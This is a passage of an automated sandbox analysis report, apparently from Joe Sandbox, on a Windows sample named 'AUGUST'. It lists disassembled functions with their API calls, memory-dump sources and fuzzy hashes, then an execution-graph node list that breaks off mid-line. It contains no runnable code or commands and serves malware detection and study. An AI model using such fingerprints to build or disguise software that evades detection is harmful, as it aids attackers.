                                            • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                            • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                            • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                            • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                            • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                            • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                            • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                            • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
                                          • String ID:
                                          • API String ID: 2538916108-0
                                          • Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                          • Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
                                          • Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                          • Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54
                                          Function 004067ED Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                          Download Yara Rule
                                          APIs
                                          • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
                                          • GetSystemMetrics.USER32(00000031), ref: 0040683A
                                          • CreateFontIndirectW.GDI32(?), ref: 00406849
                                          • DeleteObject.GDI32(00000000), ref: 00406878
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                          • String ID:
                                          • API String ID: 1900162674-0
                                          • Opcode ID: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                          • Instruction ID: e152b01862f646c7a4819b14062263d5307cf72e2961abd6127bac75ebed32e6
                                          • Opcode Fuzzy Hash: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                          • Instruction Fuzzy Hash: A9116376A00205AFDB10DF94DC88FEAB7B8EB08300F0180AAED06A7291DB74DE54CF54
                                          Function 0040748A Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040749F
                                          • SHBrowseForFolderW.SHELL32(?), ref: 004074B8
                                          • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
                                          • SHGetMalloc.SHELL32(00000000), ref: 004074FE
                                            • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                            • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                          • String ID:
                                          • API String ID: 1557639607-0
                                          • Opcode ID: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                          • Instruction ID: 30b51fec80d89fd3ac1614d0428bedaa433d1aa4d1a510c8e8bcd0531de43efe
                                          • Opcode Fuzzy Hash: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                          • Instruction Fuzzy Hash: 43112171A00114ABDB10EBA5DD48BDE77FCAB84715F1040A9E505E7280DB78EF05CB75
                                          Function 004027C7 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                          Download Yara Rule
                                          APIs
                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00402801
                                            • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                            • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00402839
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@$EnvironmentExpandStrings$??2@
                                          • String ID:
                                          • API String ID: 612612615-0
                                          • Opcode ID: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                          • Instruction ID: 71972da321696c7643696fa2d61077c4bfdb6251f9c85b9dd911fab2e4c9aeed
                                          • Opcode Fuzzy Hash: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                          • Instruction Fuzzy Hash: EF017976D00118BADB04AB55DD41DDEB7BCEF48714B10417BF901B31D1EB746A4086A8
                                          Function 00403AB1 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                            • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00413550,00413558), ref: 00403AFD
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00413550,00413558), ref: 00403B05
                                          • SetWindowTextW.USER32(?,?), ref: 00403B12
                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403B1D
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@TextWindow$Length
                                          • String ID:
                                          • API String ID: 2308334395-0
                                          • Opcode ID: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                          • Instruction ID: 2cc122b1f520d7f8021a056a959bf32eecafdcf33a956e59961b1277582e5a57
                                          • Opcode Fuzzy Hash: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                          • Instruction Fuzzy Hash: 2EF0FF32D0410DBACF01FBA5DD46CDE7B79EF04705B10406BF501720A1EA79AB559B98
                                          Function 0040702A Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetObjectW.GDI32(?,0000005C,?), ref: 00407045
                                          • CreateFontIndirectW.GDI32(?), ref: 0040705B
                                          • GetDlgItem.USER32(?,000004B5), ref: 0040706F
                                          • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: CreateFontIndirectItemMessageObjectSend
                                          • String ID:
                                          • API String ID: 2001801573-0
                                          • Opcode ID: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                          • Instruction ID: 5c236ef126686a3da9008926c30106754acf3bfa0ff8e01310dffb34f405da6a
                                          • Opcode Fuzzy Hash: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                          • Instruction Fuzzy Hash: 35F05475900704ABDB209BA4DC09F8B7BFCAB48B01F048139BD51E11D4D7B4E5018B19
                                          Function 00401BA3 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32(?), ref: 00401BA8
                                          • GetWindowRect.USER32(?,?), ref: 00401BC1
                                          • ScreenToClient.USER32(00000000,?), ref: 00401BCF
                                          • ScreenToClient.USER32(00000000,?), ref: 00401BD6
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ClientScreen$ParentRectWindow
                                          • String ID:
                                          • API String ID: 2099118873-0
                                          • Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                          • Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
                                          • Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                          • Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61
                                          Function 00403C63 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: _wtol
                                          • String ID: GUIFlags$[G@
                                          • API String ID: 2131799477-2126219683
                                          • Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                          • Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
                                          • Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                          • Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D
                                          Function 00402F10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
                                          • GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: EnvironmentVariable
                                          • String ID: ?O@
                                          • API String ID: 1431749950-3511380453
                                          • Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                          • Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
                                          • Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                          • Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98

                                          Execution Graph

                                          Execution Coverage:3.1%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:1.6%
                                          Total number of Nodes:1734
                                          Total number of Limit Nodes:37
                                          execution_graph 18532 6fa439b0 18533 6fa439ee 18532->18533 18566 6fa41990 18533->18566 18535 6fa43a0a ctype 18572 6fa42370 18535->18572 18537 6fa43a69 ctype 18627 6fa41a10 18537->18627 18539 6fa43b12 18540 6fa43b16 18539->18540 18541 6fa43b77 18539->18541 18576 6fa41000 18540->18576 18543 6fa43b81 18541->18543 18544 6fa43c3b 18541->18544 18640 6fa43090 18543->18640 18672 6fa42c10 18544->18672 18548 6fa43b8c 18649 6fa431f0 18548->18649 18557 6fa43b4c ctype 18634 6fa47202 18557->18634 18560 6fa43b65 18693 6fa45590 18560->18693 18567 6fa419b4 18566->18567 18715 6fa468e2 18567->18715 18570 6fa468e2 ctype 62 API calls 18571 6fa419e7 18570->18571 18571->18535 18573 6fa4239f ctype 18572->18573 19069 6fa414a0 18573->19069 18575 6fa4240f 18575->18537 18577 6fa4102d ctype 18576->18577 18578 6fa431f0 98 API calls 18577->18578 18579 6fa41068 18578->18579 18580 6fa415f0 63 API calls 18579->18580 18581 6fa41077 18580->18581 18582 6fa43e60 18581->18582 19109 6fa53d6c 18582->19109 18584 6fa44443 18585 6fa468e2 ctype 62 API calls 18584->18585 18587 6fa44460 ctype 18585->18587 18586 6fa43b35 18602 6fa45070 18586->18602 19163 6fa5527b 18587->19163 18589 6fa444ae 19166 6fa46dc1 18589->19166 18591 6fa468e2 ctype 62 API calls 18597 6fa43ea7 _memset 18591->18597 18596 6fa4afc3 65 API calls 18596->18597 18597->18584 18597->18586 18597->18589 18597->18591 18597->18596 18599 6fa440fd 18597->18599 19123 6fa45ca0 18597->19123 19135 6fa4b1ec 18597->19135 18599->18597 18601 6fa46750 ReadFile 18599->18601 19141 6fa45e70 18599->19141 19146 6fa46230 18599->19146 19151 6fa46160 18599->19151 19156 6fa463f0 18599->19156 18601->18599 18611 6fa450a6 18602->18611 18603 6fa453de 18605 6fa46dc1 ctype 2 API calls 18603->18605 18604 6fa452bf 19268 6fa447d0 18604->19268 18607 6fa453e3 18605->18607 18606 6fa4538f 18608 6fa468e2 ctype 62 API calls 18606->18608 18610 6fa468e2 ctype 62 API calls 18607->18610 18617 6fa45396 ctype 18608->18617 18615 6fa453ea ctype 18610->18615 18611->18603 18611->18606 18612 6fa4525a 18611->18612 19209 6fa44880 18611->19209 19229 6fa44ac0 18611->19229 18612->18603 18612->18604 18612->18607 19264 6fa445f0 18612->19264 18616 6fa5527b __CxxThrowException@8 RaiseException 18615->18616 18621 6fa45432 18616->18621 18618 6fa5527b __CxxThrowException@8 RaiseException 18617->18618 18618->18603 18619 6fa4530c 18619->18557 18623 6fa431f0 98 API calls 18626 6fa45141 18623->18626 18624 6fa42600 96 API calls 18624->18626 18626->18611 18626->18623 18626->18624 19253 6fa462d0 18626->19253 19258 6fa45490 18626->19258 19522 6fa4764f 18627->19522 18629 6fa41a59 ctype 18633 6fa41af7 18629->18633 19537 6fa472fd 18629->19537 18631 6fa41ab1 GetDiskFreeSpaceW 18631->18633 18633->18539 18635 6fa47220 ctype 18634->18635 18636 6fa47212 CloseHandle 18634->18636 18637 6fa47244 18635->18637 18638 6fa47236 GetLastError 18635->18638 18636->18635 18637->18560 19624 6fa47bcb 18638->19624 19638 6fa42f60 18640->19638 18642 6fa4309f 18643 6fa430a7 18642->18643 18644 6fa430bc 18642->18644 19652 6fa43370 18643->19652 19660 6fa41580 18644->19660 18647 6fa430b8 18647->18548 18648 6fa430c7 18648->18548 18650 6fa43222 ctype 18649->18650 18651 6fa4aef1 ctype 31 API calls 18650->18651 18652 6fa43254 18651->18652 19669 6fa433f0 FindResourceExW 18652->19669 18654 6fa43268 18655 6fa4326c 18654->18655 18656 6fa4aef1 ctype 31 API calls 18654->18656 18657 6fa41580 62 API calls 18655->18657 18658 6fa432bf 18656->18658 18666 6fa43279 18657->18666 18659 6fa433f0 66 API calls 18658->18659 18660 6fa432d3 18659->18660 18661 6fa432d7 18660->18661 18662 6fa43308 18660->18662 18663 6fa41580 62 API calls 18661->18663 18664 6fa4a58c 31 API calls 18662->18664 18663->18666 18665 6fa4330e 18664->18665 18665->18655 18667 6fa43325 18665->18667 18669 6fa42600 18666->18669 18668 6fa42b50 94 API calls 18667->18668 18668->18666 19683 6fa41240 18669->19683 18671 6fa42613 18671->18560 18673 6fa42c51 ctype 18672->18673 18674 6fa431f0 98 API calls 18673->18674 18680 6fa42cc0 18673->18680 18676 6fa42cad 18674->18676 18675 6fa431f0 98 API calls 18677 6fa42cf9 18675->18677 18678 6fa544cb 62 API calls 18676->18678 18679 6fa42600 96 API calls 18677->18679 18678->18680 18681 6fa42d0b 18679->18681 18680->18675 18682 6fa42d3c 18681->18682 18683 6fa46911 ctype 63 API calls 18681->18683 18684 6fa415f0 18682->18684 18683->18682 18685 6fa41606 18684->18685 18686 6fa4165a 18684->18686 18687 6fa41646 18685->18687 18688 6fa41616 18685->18688 18686->18560 18689 6fa414a0 ctype 63 API calls 18687->18689 18690 6fa41580 62 API calls 18688->18690 18691 6fa41652 18689->18691 18692 6fa4161d 18690->18692 18691->18560 18692->18560 18694 6fa455bb 18693->18694 18698 6fa43d8b 18693->18698 18695 6fa431f0 98 API calls 18694->18695 18694->18698 18696 6fa455d1 18695->18696 18697 6fa42600 96 API calls 18696->18697 18697->18698 18699 6fa42490 18698->18699 18700 6fa424d1 ctype 18699->18700 19952 6fa47343 18700->19952 18718 6fa468ea 18715->18718 18717 6fa419be 18717->18570 18718->18717 18719 6fa549fe 18718->18719 18720 6fa54ab1 18719->18720 18734 6fa54a10 18719->18734 18721 6fa5c08e _malloc 6 API calls 18720->18721 18722 6fa54ab7 18721->18722 18724 6fa55348 __strnicoll_l 61 API calls 18722->18724 18729 6fa54aa9 18724->18729 18727 6fa54a6d HeapAlloc 18727->18734 18729->18718 18730 6fa54a9d 18793 6fa55348 18730->18793 18733 6fa54aa2 18735 6fa55348 __strnicoll_l 61 API calls 18733->18735 18734->18727 18734->18729 18734->18730 18734->18733 18736 6fa5c046 18734->18736 18745 6fa5be9b 18734->18745 18779 6fa55c53 18734->18779 18782 6fa549af 18734->18782 18790 6fa5c08e 18734->18790 18735->18729 18796 6fa60cfc 18736->18796 18739 6fa5c05a 18741 6fa5be9b __NMSG_WRITE 62 API calls 18739->18741 18743 6fa5c07c 18739->18743 18740 6fa60cfc __set_error_mode 62 API calls 18740->18739 18742 6fa5c072 18741->18742 18744 6fa5be9b __NMSG_WRITE 62 API calls 18742->18744 18743->18734 18744->18743 18746 6fa5beaf 18745->18746 18747 6fa60cfc __set_error_mode 59 API calls 18746->18747 18778 6fa5c00a 18746->18778 18748 6fa5bed1 18747->18748 18749 6fa5c00f GetStdHandle 18748->18749 18751 6fa60cfc __set_error_mode 59 API calls 18748->18751 18750 6fa5c01d _strlen 18749->18750 18749->18778 18754 6fa5c036 WriteFile 18750->18754 18750->18778 18752 6fa5bee2 18751->18752 18752->18749 18753 6fa5bef4 18752->18753 18753->18778 18819 6fa60997 18753->18819 18754->18778 18757 6fa5bf2a GetModuleFileNameA 18759 6fa5bf48 18757->18759 18764 6fa5bf6b _strlen 18757->18764 18761 6fa60997 _strcpy_s 59 API calls 18759->18761 18762 6fa5bf58 18761->18762 18762->18764 18765 6fa58034 __invoke_watson 10 API calls 18762->18765 18763 6fa5bfae 18844 6fa60bd3 18763->18844 18764->18763 18835 6fa60c47 18764->18835 18765->18764 18769 6fa5bfd2 18772 6fa60bd3 _strcat_s 59 API calls 18769->18772 18771 6fa58034 __invoke_watson 10 API calls 18771->18769 18773 6fa5bfe6 18772->18773 18775 6fa5bff7 18773->18775 18776 6fa58034 __invoke_watson 10 API calls 18773->18776 18774 6fa58034 __invoke_watson 10 API calls 18774->18763 18853 6fa60a6a 18775->18853 18776->18775 18778->18734 18904 6fa55c28 GetModuleHandleW 18779->18904 18783 6fa549bb __freefls@4 18782->18783 18784 6fa549ec __freefls@4 18783->18784 18907 6fa5a914 18783->18907 18784->18734 18786 6fa549d1 18914 6fa5b126 18786->18914 18791 6fa5a033 __decode_pointer 6 API calls 18790->18791 18792 6fa5c09e 18791->18792 18792->18734 18988 6fa5a206 GetLastError 18793->18988 18795 6fa5534d 18795->18733 18797 6fa60d0b 18796->18797 18798 6fa55348 __strnicoll_l 62 API calls 18797->18798 18799 6fa5c04d 18797->18799 18800 6fa60d2e 18798->18800 18799->18739 18799->18740 18802 6fa5815c 18800->18802 18805 6fa5a033 TlsGetValue 18802->18805 18804 6fa5816c __invoke_watson 18806 6fa5a06c GetModuleHandleW 18805->18806 18807 6fa5a04b 18805->18807 18808 6fa5a087 GetProcAddress 18806->18808 18809 6fa5a07c 18806->18809 18807->18806 18810 6fa5a055 TlsGetValue 18807->18810 18812 6fa5a064 18808->18812 18815 6fa55bcf 18809->18815 18814 6fa5a060 18810->18814 18812->18804 18814->18806 18814->18812 18816 6fa55bda Sleep GetModuleHandleW 18815->18816 18817 6fa55bfc 18816->18817 18818 6fa55bf8 18816->18818 18817->18808 18817->18812 18818->18816 18818->18817 18820 6fa609af 18819->18820 18821 6fa609a8 18819->18821 18822 6fa55348 __strnicoll_l 62 API calls 18820->18822 18821->18820 18826 6fa609d5 18821->18826 18823 6fa609b4 18822->18823 18824 6fa5815c __strnicoll_l 6 API calls 18823->18824 18825 6fa5bf16 18824->18825 18825->18757 18828 6fa58034 18825->18828 18826->18825 18827 6fa55348 __strnicoll_l 62 API calls 18826->18827 18827->18823 18880 6fa555b0 18828->18880 18830 6fa58061 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18831 6fa58131 __invoke_watson 18830->18831 18832 6fa5813d GetCurrentProcess TerminateProcess 18830->18832 18831->18832 18882 6fa53f34 18832->18882 18834 6fa5815a 18834->18757 18840 6fa60c59 18835->18840 18836 6fa60c5d 18837 6fa5bf9b 18836->18837 18838 6fa55348 __strnicoll_l 62 API calls 18836->18838 18837->18763 18837->18774 18839 6fa60c79 18838->18839 18841 6fa5815c __strnicoll_l 6 API calls 18839->18841 18840->18836 18840->18837 18842 6fa60ca3 18840->18842 18841->18837 18842->18837 18843 6fa55348 __strnicoll_l 62 API calls 18842->18843 18843->18839 18845 6fa60beb 18844->18845 18848 6fa60be4 18844->18848 18846 6fa55348 __strnicoll_l 62 API calls 18845->18846 18847 6fa60bf0 18846->18847 18849 6fa5815c __strnicoll_l 6 API calls 18847->18849 18848->18845 18851 6fa60c1f 18848->18851 18850 6fa5bfc1 18849->18850 18850->18769 18850->18771 18851->18850 18852 6fa55348 __strnicoll_l 62 API calls 18851->18852 18852->18847 18891 6fa5a02a 18853->18891 18856 6fa60a8d LoadLibraryA 18857 6fa60aa2 GetProcAddress 18856->18857 18860 6fa60bb7 18856->18860 18859 6fa60ab8 18857->18859 18857->18860 18858 6fa60b15 18863 6fa5a033 __decode_pointer 6 API calls 18858->18863 18875 6fa60b3f 18858->18875 18894 6fa59fb8 TlsGetValue 18859->18894 18860->18778 18861 6fa5a033 __decode_pointer 6 API calls 18861->18860 18862 6fa5a033 __decode_pointer 6 API calls 18872 6fa60b82 18862->18872 18865 6fa60b32 18863->18865 18867 6fa5a033 __decode_pointer 6 API calls 18865->18867 18867->18875 18868 6fa59fb8 __encode_pointer 6 API calls 18869 6fa60ad3 GetProcAddress 18868->18869 18870 6fa59fb8 __encode_pointer 6 API calls 18869->18870 18871 6fa60ae8 GetProcAddress 18870->18871 18873 6fa59fb8 __encode_pointer 6 API calls 18871->18873 18874 6fa5a033 __decode_pointer 6 API calls 18872->18874 18878 6fa60b6a 18872->18878 18876 6fa60afd 18873->18876 18874->18878 18875->18862 18875->18878 18876->18858 18877 6fa60b07 GetProcAddress 18876->18877 18879 6fa59fb8 __encode_pointer 6 API calls 18877->18879 18878->18861 18879->18858 18881 6fa555bc __VEC_memzero 18880->18881 18881->18830 18883 6fa53f3c 18882->18883 18884 6fa53f3e IsDebuggerPresent 18882->18884 18883->18834 18890 6fa5ee35 18884->18890 18887 6fa57c7e SetUnhandledExceptionFilter UnhandledExceptionFilter 18888 6fa57ca3 GetCurrentProcess TerminateProcess 18887->18888 18889 6fa57c9b __invoke_watson 18887->18889 18888->18834 18889->18888 18890->18887 18892 6fa59fb8 __encode_pointer 6 API calls 18891->18892 18893 6fa5a031 18892->18893 18893->18856 18893->18858 18895 6fa59ff1 GetModuleHandleW 18894->18895 18896 6fa59fd0 18894->18896 18898 